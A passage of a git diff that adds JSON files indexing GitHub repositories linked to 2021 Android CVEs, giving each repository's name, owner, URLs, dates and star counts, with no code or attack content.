+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0319.json b/2021/CVE-2021-0319.json
new file mode 100644
index 0000000000..db48dbc8a1
--- /dev/null
+++ b/2021/CVE-2021-0319.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 482789876,
+ "name": "frameworks_base_AOSP10_r33_CVE-2021-0319",
+ "full_name": "Satheesh575555\/frameworks_base_AOSP10_r33_CVE-2021-0319",
+ "owner": {
+ "login": "Satheesh575555",
+ "id": 102573923,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4",
+ "html_url": "https:\/\/github.com\/Satheesh575555"
+ },
+ "html_url": "https:\/\/github.com\/Satheesh575555\/frameworks_base_AOSP10_r33_CVE-2021-0319",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-18T09:31:22Z",
+ "updated_at": "2023-03-27T01:30:11Z",
+ "pushed_at": "2022-04-18T09:35:34Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0325.json b/2021/CVE-2021-0325.json
new file mode 100644
index 0000000000..13e28c0f39
--- /dev/null
+++ b/2021/CVE-2021-0325.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 476747255,
+ "name": "external_libavc_AOSP10_r33_CVE-2021-0325",
+ "full_name": "nanopathi\/external_libavc_AOSP10_r33_CVE-2021-0325",
+ "owner": {
+ "login": "nanopathi",
+ "id": 26024136,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4",
+ "html_url": "https:\/\/github.com\/nanopathi"
+ },
+ "html_url": "https:\/\/github.com\/nanopathi\/external_libavc_AOSP10_r33_CVE-2021-0325",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-01T14:11:58Z",
+ "updated_at": "2022-04-18T09:32:07Z",
+ "pushed_at": "2023-02-28T07:12:33Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0326.json b/2021/CVE-2021-0326.json
new file mode 100644
index 0000000000..276c107b63
--- /dev/null
+++ b/2021/CVE-2021-0326.json
@@ -0,0 +1,152 @@
+[
+ {
+ "id": 449055330,
+ "name": "skeleton",
+ "full_name": "aemmitt-ns\/skeleton",
+ "owner": {
+ "login": "aemmitt-ns",
+ "id": 51972960,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51972960?v=4",
+ "html_url": "https:\/\/github.com\/aemmitt-ns"
+ },
+ "html_url": "https:\/\/github.com\/aemmitt-ns\/skeleton",
+ "description": "Skeleton (but pronounced like Peloton): A Zero-Click RCE exploit for CVE-2021-0326",
+ "fork": false,
+ "created_at": "2022-01-17T21:35:19Z",
+ "updated_at": "2024-04-05T14:25:14Z",
+ "pushed_at": "2022-03-16T02:58:42Z",
+ "stargazers_count": 18,
+ "watchers_count": 18,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 18,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 485818095,
+ "name": "wpa_supplicant_8_CVE-2021-0326.",
+ "full_name": "nanopathi\/wpa_supplicant_8_CVE-2021-0326.",
+ "owner": {
+ "login": "nanopathi",
+ "id": 26024136,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4",
+ "html_url": "https:\/\/github.com\/nanopathi"
+ },
+ "html_url": "https:\/\/github.com\/nanopathi\/wpa_supplicant_8_CVE-2021-0326.",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-26T14:19:31Z",
+ "updated_at": "2022-04-26T14:29:01Z",
+ "pushed_at": "2022-04-26T14:29:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 485823302,
+ "name": "external_wpa_supplicant_8_AOSP10_r33_CVE-2021-0326",
+ "full_name": "Satheesh575555\/external_wpa_supplicant_8_AOSP10_r33_CVE-2021-0326",
+ "owner": {
+ "login": "Satheesh575555",
+ "id": 102573923,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4",
+ "html_url": "https:\/\/github.com\/Satheesh575555"
+ },
+ "html_url": "https:\/\/github.com\/Satheesh575555\/external_wpa_supplicant_8_AOSP10_r33_CVE-2021-0326",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-26T14:33:04Z",
+ "updated_at": "2023-09-15T18:30:40Z",
+ "pushed_at": "2022-04-26T14:34:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 485826624,
+ "name": "Packages_wpa_supplicant8_CVE-2021-0326",
+ "full_name": "nanopathi\/Packages_wpa_supplicant8_CVE-2021-0326",
+ "owner": {
+ "login": "nanopathi",
+ "id": 26024136,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4",
+ "html_url": "https:\/\/github.com\/nanopathi"
+ },
+ "html_url": "https:\/\/github.com\/nanopathi\/Packages_wpa_supplicant8_CVE-2021-0326",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-26T14:41:51Z",
+ "updated_at": "2022-04-26T15:02:31Z",
+ "pushed_at": "2022-04-26T15:05:14Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 486940425,
+ "name": "external_wpa_supplicant_8_AOSP10_r33CVE-2021-0326",
+ "full_name": "ShaikUsaf\/external_wpa_supplicant_8_AOSP10_r33CVE-2021-0326",
+ "owner": {
+ "login": "ShaikUsaf",
+ "id": 100413972,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4",
+ "html_url": "https:\/\/github.com\/ShaikUsaf"
+ },
+ "html_url": "https:\/\/github.com\/ShaikUsaf\/external_wpa_supplicant_8_AOSP10_r33CVE-2021-0326",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-29T11:05:51Z",
+ "updated_at": "2022-04-29T11:10:13Z",
+ "pushed_at": "2022-04-29T11:10:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0327.json b/2021/CVE-2021-0327.json
new file mode 100644
index 0000000000..5012d9ac49
--- /dev/null
+++ b/2021/CVE-2021-0327.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 484631242,
+ "name": "framework_base_AOSP10_r33_CVE-2021-0327",
+ "full_name": "nanopathi\/framework_base_AOSP10_r33_CVE-2021-0327",
+ "owner": {
+ "login": "nanopathi",
+ "id": 26024136,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4",
+ "html_url": "https:\/\/github.com\/nanopathi"
+ },
+ "html_url": "https:\/\/github.com\/nanopathi\/framework_base_AOSP10_r33_CVE-2021-0327",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-23T03:01:52Z",
+ "updated_at": "2022-04-23T04:47:32Z",
+ "pushed_at": "2022-04-23T04:46:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0328.json b/2021/CVE-2021-0328.json
new file mode 100644
index 0000000000..8ce5c528ff
--- /dev/null
+++ b/2021/CVE-2021-0328.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 486508581,
+ "name": "packages_apps_Bluetooth_AOSP10_r33_CVE-2021-0328",
+ "full_name": "ShaikUsaf\/packages_apps_Bluetooth_AOSP10_r33_CVE-2021-0328",
+ "owner": {
+ "login": "ShaikUsaf",
+ "id": 100413972,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4",
+ "html_url": "https:\/\/github.com\/ShaikUsaf"
+ },
+ "html_url": "https:\/\/github.com\/ShaikUsaf\/packages_apps_Bluetooth_AOSP10_r33_CVE-2021-0328",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-28T08:28:31Z",
+ "updated_at": "2022-04-28T08:34:44Z",
+ "pushed_at": "2022-04-28T08:35:20Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0329.json b/2021/CVE-2021-0329.json
new file mode 100644
index 0000000000..8f70b14057
--- /dev/null
+++ b/2021/CVE-2021-0329.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 486512388,
+ "name": "packages_apps_Bluetooth_AOSP10_r33_CVE-2021-0329",
+ "full_name": "ShaikUsaf\/packages_apps_Bluetooth_AOSP10_r33_CVE-2021-0329",
+ "owner": {
+ "login": "ShaikUsaf",
+ "id": 100413972,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4",
+ "html_url": "https:\/\/github.com\/ShaikUsaf"
+ },
+ "html_url": "https:\/\/github.com\/ShaikUsaf\/packages_apps_Bluetooth_AOSP10_r33_CVE-2021-0329",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-28T08:41:00Z",
+ "updated_at": "2022-07-19T14:45:30Z",
+ "pushed_at": "2022-04-28T08:44:31Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0330.json b/2021/CVE-2021-0330.json
new file mode 100644
index 0000000000..4209a6b32a
--- /dev/null
+++ b/2021/CVE-2021-0330.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 476240143,
+ "name": "system_core_AOSP10_r33-CVE-2021-0330",
+ "full_name": "Satheesh575555\/system_core_AOSP10_r33-CVE-2021-0330",
+ "owner": {
+ "login": "Satheesh575555",
+ "id": 102573923,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4",
+ "html_url": "https:\/\/github.com\/Satheesh575555"
+ },
+ "html_url": "https:\/\/github.com\/Satheesh575555\/system_core_AOSP10_r33-CVE-2021-0330",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-03-31T09:36:07Z",
+ "updated_at": "2022-03-31T09:39:44Z",
+ "pushed_at": "2022-03-31T09:40:00Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0331.json b/2021/CVE-2021-0331.json
new file mode 100644
index 0000000000..0605fe11b1
--- /dev/null
+++ b/2021/CVE-2021-0331.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 481851030,
+ "name": "packages_apps_Settings_AOSP10_r33_CVE-2021-0331",
+ "full_name": "Satheesh575555\/packages_apps_Settings_AOSP10_r33_CVE-2021-0331",
+ "owner": {
+ "login": "Satheesh575555",
+ "id": 102573923,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4",
+ "html_url": "https:\/\/github.com\/Satheesh575555"
+ },
+ "html_url": "https:\/\/github.com\/Satheesh575555\/packages_apps_Settings_AOSP10_r33_CVE-2021-0331",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-15T05:45:49Z",
+ "updated_at": "2023-03-27T01:34:20Z",
+ "pushed_at": "2022-04-18T10:45:27Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0332.json b/2021/CVE-2021-0332.json
new file mode 100644
index 0000000000..760316e9c4
--- /dev/null
+++ b/2021/CVE-2021-0332.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 483117532,
+ "name": "frameworks_native_AOSP10_r33_CVE-2021-0332",
+ "full_name": "Satheesh575555\/frameworks_native_AOSP10_r33_CVE-2021-0332",
+ "owner": {
+ "login": "Satheesh575555",
+ "id": 102573923,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4",
+ "html_url": "https:\/\/github.com\/Satheesh575555"
+ },
+ "html_url": "https:\/\/github.com\/Satheesh575555\/frameworks_native_AOSP10_r33_CVE-2021-0332",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-19T06:06:57Z",
+ "updated_at": "2023-03-27T01:39:42Z",
+ "pushed_at": "2022-04-19T06:12:01Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0333.json b/2021/CVE-2021-0333.json
new file mode 100644
index 0000000000..86c801badb
--- /dev/null
+++ b/2021/CVE-2021-0333.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 480365226,
+ "name": "packages_apps_Settings_AOSP10_r33_CVE-2021-0333",
+ "full_name": "Satheesh575555\/packages_apps_Settings_AOSP10_r33_CVE-2021-0333",
+ "owner": {
+ "login": "Satheesh575555",
+ "id": 102573923,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4",
+ "html_url": "https:\/\/github.com\/Satheesh575555"
+ },
+ "html_url": "https:\/\/github.com\/Satheesh575555\/packages_apps_Settings_AOSP10_r33_CVE-2021-0333",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-11T12:14:18Z",
+ "updated_at": "2023-03-27T01:21:17Z",
+ "pushed_at": "2022-04-11T12:18:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0334.json b/2021/CVE-2021-0334.json
new file mode 100644
index 0000000000..b4535db4f2
--- /dev/null
+++ b/2021/CVE-2021-0334.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 476687472,
+ "name": "frameworks_base_AOSP10_r33_CVE-2021-0334",
+ "full_name": "ShaikUsaf\/frameworks_base_AOSP10_r33_CVE-2021-0334",
+ "owner": {
+ "login": "ShaikUsaf",
+ "id": 100413972,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4",
+ "html_url": "https:\/\/github.com\/ShaikUsaf"
+ },
+ "html_url": "https:\/\/github.com\/ShaikUsaf\/frameworks_base_AOSP10_r33_CVE-2021-0334",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-01T11:10:57Z",
+ "updated_at": "2022-04-01T11:28:17Z",
+ "pushed_at": "2022-04-01T12:01:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0336.json b/2021/CVE-2021-0336.json
new file mode 100644
index 0000000000..027b2cb528
--- /dev/null
+++ b/2021/CVE-2021-0336.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 484323372,
+ "name": "packages_apps_Settings_AOSP10_r33_CVE-2021-0336",
+ "full_name": "Trinadh465\/packages_apps_Settings_AOSP10_r33_CVE-2021-0336",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/packages_apps_Settings_AOSP10_r33_CVE-2021-0336",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-22T06:36:57Z",
+ "updated_at": "2023-03-27T01:18:10Z",
+ "pushed_at": "2022-04-22T06:44:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0337.json b/2021/CVE-2021-0337.json
new file mode 100644
index 0000000000..fa2698a90d
--- /dev/null
+++ b/2021/CVE-2021-0337.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 484647956,
+ "name": "frameworks_base_AOSP10_r33_CVE-2021-0337",
+ "full_name": "ShaikUsaf\/frameworks_base_AOSP10_r33_CVE-2021-0337",
+ "owner": {
+ "login": "ShaikUsaf",
+ "id": 100413972,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100413972?v=4",
+ "html_url": "https:\/\/github.com\/ShaikUsaf"
+ },
+ "html_url": "https:\/\/github.com\/ShaikUsaf\/frameworks_base_AOSP10_r33_CVE-2021-0337",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-23T04:41:42Z",
+ "updated_at": "2022-04-23T05:03:49Z",
+ "pushed_at": "2022-04-23T05:03:28Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0339.json b/2021/CVE-2021-0339.json
new file mode 100644
index 0000000000..e015c7dcf4
--- /dev/null
+++ b/2021/CVE-2021-0339.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 485260390,
+ "name": "framework_base_AOSP10_r33_CVE-2021-0339",
+ "full_name": "nanopathi\/framework_base_AOSP10_r33_CVE-2021-0339",
+ "owner": {
+ "login": "nanopathi",
+ "id": 26024136,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4",
+ "html_url": "https:\/\/github.com\/nanopathi"
+ },
+ "html_url": "https:\/\/github.com\/nanopathi\/framework_base_AOSP10_r33_CVE-2021-0339",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-25T07:09:36Z",
+ "updated_at": "2022-06-04T15:31:40Z",
+ "pushed_at": "2022-04-25T07:27:09Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0340.json b/2021/CVE-2021-0340.json
new file mode 100644
index 0000000000..319ed6741a
--- /dev/null
+++ b/2021/CVE-2021-0340.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 483253394,
+ "name": "packages_providers_MediaProvider_AOSP10_r33_CVE-2021-0340",
+ "full_name": "Satheesh575555\/packages_providers_MediaProvider_AOSP10_r33_CVE-2021-0340",
+ "owner": {
+ "login": "Satheesh575555",
+ "id": 102573923,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4",
+ "html_url": "https:\/\/github.com\/Satheesh575555"
+ },
+ "html_url": "https:\/\/github.com\/Satheesh575555\/packages_providers_MediaProvider_AOSP10_r33_CVE-2021-0340",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-19T13:15:49Z",
+ "updated_at": "2023-10-30T06:48:48Z",
+ "pushed_at": "2022-04-19T13:21:06Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 484320137,
+ "name": "packages_providers_MediaProvider_AOSP10_r33_CVE-2021-0340",
+ "full_name": "nanopathi\/packages_providers_MediaProvider_AOSP10_r33_CVE-2021-0340",
+ "owner": {
+ "login": "nanopathi",
+ "id": 26024136,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4",
+ "html_url": "https:\/\/github.com\/nanopathi"
+ },
+ "html_url": "https:\/\/github.com\/nanopathi\/packages_providers_MediaProvider_AOSP10_r33_CVE-2021-0340",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-22T06:24:14Z",
+ "updated_at": "2022-04-22T07:23:26Z",
+ "pushed_at": "2022-04-22T07:24:07Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0390.json b/2021/CVE-2021-0390.json
new file mode 100644
index 0000000000..549350d2c5
--- /dev/null
+++ b/2021/CVE-2021-0390.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 816842838,
+ "name": "frameworks_opt_net_wifi_CVE-2021-0390",
+ "full_name": "uthrasri\/frameworks_opt_net_wifi_CVE-2021-0390",
+ "owner": {
+ "login": "uthrasri",
+ "id": 145666390,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4",
+ "html_url": "https:\/\/github.com\/uthrasri"
+ },
+ "html_url": "https:\/\/github.com\/uthrasri\/frameworks_opt_net_wifi_CVE-2021-0390",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-18T13:59:29Z",
+ "updated_at": "2024-06-19T13:21:54Z",
+ "pushed_at": "2024-06-18T14:14:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0391.json b/2021/CVE-2021-0391.json
new file mode 100644
index 0000000000..f5199a2910
--- /dev/null
+++ b/2021/CVE-2021-0391.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 480301366,
+ "name": "framework_base_AOSP10_r33_CVE-2021-0391",
+ "full_name": "nanopathi\/framework_base_AOSP10_r33_CVE-2021-0391",
+ "owner": {
+ "login": "nanopathi",
+ "id": 26024136,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4",
+ "html_url": "https:\/\/github.com\/nanopathi"
+ },
+ "html_url": "https:\/\/github.com\/nanopathi\/framework_base_AOSP10_r33_CVE-2021-0391",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-11T08:57:29Z",
+ "updated_at": "2022-04-11T09:05:29Z",
+ "pushed_at": "2022-04-11T09:05:12Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0392.json b/2021/CVE-2021-0392.json
new file mode 100644
index 0000000000..39fe828ce4
--- /dev/null
+++ b/2021/CVE-2021-0392.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 816643355,
+ "name": "System_Connectivity_Wificond_CVE-2021-0392",
+ "full_name": "uthrasri\/System_Connectivity_Wificond_CVE-2021-0392",
+ "owner": {
+ "login": "uthrasri",
+ "id": 145666390,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4",
+ "html_url": "https:\/\/github.com\/uthrasri"
+ },
+ "html_url": "https:\/\/github.com\/uthrasri\/System_Connectivity_Wificond_CVE-2021-0392",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-18T06:25:02Z",
+ "updated_at": "2024-06-18T07:43:08Z",
+ "pushed_at": "2024-06-18T07:43:10Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0393.json b/2021/CVE-2021-0393.json
new file mode 100644
index 0000000000..d31737c5b6
--- /dev/null
+++ b/2021/CVE-2021-0393.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 486872701,
+ "name": "external_v8_AOSP10_r33_CVE-2021-0393",
+ "full_name": "Trinadh465\/external_v8_AOSP10_r33_CVE-2021-0393",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/external_v8_AOSP10_r33_CVE-2021-0393",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-29T07:09:27Z",
+ "updated_at": "2023-04-17T01:13:04Z",
+ "pushed_at": "2022-04-29T07:12:21Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-0394.json b/2021/CVE-2021-0394.json
new file mode 100644
index 0000000000..949086a81b
--- /dev/null
+++ b/2021/CVE-2021-0394.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 486047327,
+ "name": "packages_apps_Settings_CVE-2021-0394",
+ "full_name": "nanopathi\/packages_apps_Settings_CVE-2021-0394",
+ "owner": {
+ "login": "nanopathi",
+ "id": 26024136,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26024136?v=4",
+ "html_url": "https:\/\/github.com\/nanopathi"
+ },
+ "html_url": "https:\/\/github.com\/nanopathi\/packages_apps_Settings_CVE-2021-0394",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-04-27T04:40:51Z",
+ "updated_at": "2022-04-27T04:40:51Z",
+ "pushed_at": "2022-04-27T04:40:51Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
